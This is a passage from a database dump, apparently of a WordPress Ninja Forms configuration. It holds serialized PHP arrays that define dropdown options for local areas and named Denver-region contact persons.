Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:9:\"Northwest\";s:5:\"value\";s:9:\"Northwest\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:7;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:8:\"selected\";s:1:\"0\";s:5:\"label\";s:5:\"Other\";s:5:\"value\";s:5:\"Other\";s:4:\"calc\";s:0:\"\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}'),(9294,290,'key','listselect_98','key','listselect_98'),(9295,290,'container_class','one-half first','container_class','one-half first'),(9296,290,'parent_id','6','parent_id','6'),(9297,290,'field_label','Your Local Area','field_label','Your Local Area'),(9298,290,'field_key','listselect_98','field_key','listselect_98'),(12230,380,'input_limit_type','char','input_limit_type','char'),(12229,380,'input_limit','','input_limit',''),(12220,380,'user_zip','0','user_zip','0'),(12221,380,'user_email','0','user_email','0'),(12222,380,'user_info_field_group','1','user_info_field_group','1'),(12223,380,'show_help','0','show_help','0'),(12224,380,'help_text','','help_text',''),(12225,380,'calc_auto_include','0','calc_auto_include','0'),(12226,380,'calc_option','0','calc_option','0'),(12227,380,'placeholder','','placeholder',''),(12228,380,'disable_input','0','disable_input','0'),(12070,377,'from_name','0','from_name','0'),(12071,377,'user_info_field_group','1','user_info_field_group','1'),(12068,377,'first_name','1','first_name','1'),(12069,377,'last_name','0','last_name','0'),(12066,377,'mask','','mask',''),(12067,377,'datepicker','0','datepicker','0'),(12065,377,'label_pos','above','label_pos','above'),(12063,377,'def_id','6','def_id','6'),(12064,377,'label','First Name','label','First Name'),(12061,377,'order','1','order','1'),(12062,377,'type','textbox','type','textbox'),(12060,377,'editActive','','editActive',''),(12058,377,'objectType','Field','objectType','Field'),(12059,377,'objectDomain','fields','objectDomain','fields'),(12057,377,'custom_name_attribute','','custom_name_attribute',''),(12055,377,'field_label','First Name','field_label','First Name'),(12056,377,'field_key','textbox_21','field_key','textbox_21'),(12053,377,'personally_identifiable','','personally_identifiable',''),(12054,377,'value','','value',''),(12052,376,'idAttribute','id','idAttribute','id'),(12049,376,'key','html_20','key','html_20'),(12050,376,'container_class','','container_class',''),(12051,376,'parent_id','8','parent_id','8'),(9335,293,'objectType','Field','objectType','Field'),(9336,293,'objectDomain','fields','objectDomain','fields'),(9337,293,'editActive','','editActive',''),(9338,293,'order','7','order','7'),(9339,293,'type','listselect','type','listselect'),(9340,293,'label','Select The Person You Would Like To Contact','label','Select The Person You Would Like To Contact'),(9341,293,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(9342,293,'label_pos','above','label_pos','above'),(9343,293,'list_type','dropdown','list_type','dropdown'),(9344,293,'multi_size','5','multi_size','5'),(9345,293,'list_show_value','1','list_show_value','1'),(9346,293,'list','a:0:{}','list','a:0:{}'),(9347,293,'user_info_field_group','','user_info_field_group',''),(9348,293,'calc_auto_include','0','calc_auto_include','0'),(9349,293,'user_state','0','user_state','0'),(9350,293,'num_sort','0','num_sort','0'),(9351,293,'admin_label','','admin_label',''),(9352,293,'show_help','0','show_help','0'),(9353,293,'help_text','','help_text',''),(9354,293,'show_desc','0','show_desc','0'),(9355,293,'desc_pos','none','desc_pos','none'),(9356,293,'desc_text','','desc_text',''),(9357,293,'element_class','','element_class',''),(9358,293,'required','1','required','1'),(9359,293,'options','a:14:{i:0;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";s:1:\"0\";}i:1;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:44:\"ESA/Initiator-Fred Bell-Denver Metro Central\";s:5:\"value\";s:44:\"esa-initiator-fred-bell-denver-metro-central\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";s:1:\"1\";}i:2;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"order\";s:1:\"2\";s:3:\"new\";s:0:\"\";s:7:\"options\";a:0:{}s:5:\"label\";s:49:\"ESA/Initiator-Gordon Garland-Denver Metro Central\";s:5:\"value\";s:24:\"Initiator-Vickie Cashman\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";s:1:\"1\";}i:3;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"order\";s:1:\"5\";s:3:\"new\";s:0:\"\";s:7:\"options\";a:0:{}s:5:\"label\";s:52:\"ESA/Initiator-Bette Jean Wagner-Denver Metro Central\";s:5:\"value\";s:52:\"ESA-Initiator-bette-jean-wagner-denver-metro-central\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:4;a:9:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:46:\"ESA/Initiator-James Fischer-Denver Metro North\";s:5:\"value\";s:46:\"ESA-Initiator-James Fischer-Denver Metro North\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";s:1:\"6\";s:12:\"manual_value\";b:1;}i:5;a:10:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:6;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:41:\"Initiator-Lura Fischer-Denver Metro North\";s:5:\"value\";s:41:\"initiator-lura-fischer-denver-metro-north\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:7;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:46:\"ESA/Initiator-Lura Lee Genz-Denver Metro North\";s:5:\"value\";s:46:\"ESA-Initiator-Lura Lee Genz-Denver Metro North\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:7;a:10:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:10;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:41:\"ESA/Initiator-Tim Kuss-Denver Metro South\";s:5:\"value\";s:41:\"esa-initiator-tim-kuss-denver-metro-south\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:8;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:11;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:43:\"ESA/Initiator-Jack Lile-Denver Metro South \";s:5:\"value\";s:43:\"ESA-Initiator-Jack Lile-Denver Metro South \";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:9;a:10:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:12;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:43:\"ESA/Initiator-Raelin Harp-Denver Metro East\";s:5:\"value\";s:43:\"esa-initiator-raelin-harp-denver-metro-east\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:10;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:13;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:26:\"ESA/Initiator-Linda Bowman\";s:5:\"value\";s:26:\"ESA-Initiator-Linda Bowman\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:11;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:14;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:30:\"ESA/Initiator-Rolf Mueller-Uri\";s:5:\"value\";s:29:\"ESAInitiator-Rolf Mueller-Uri\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc 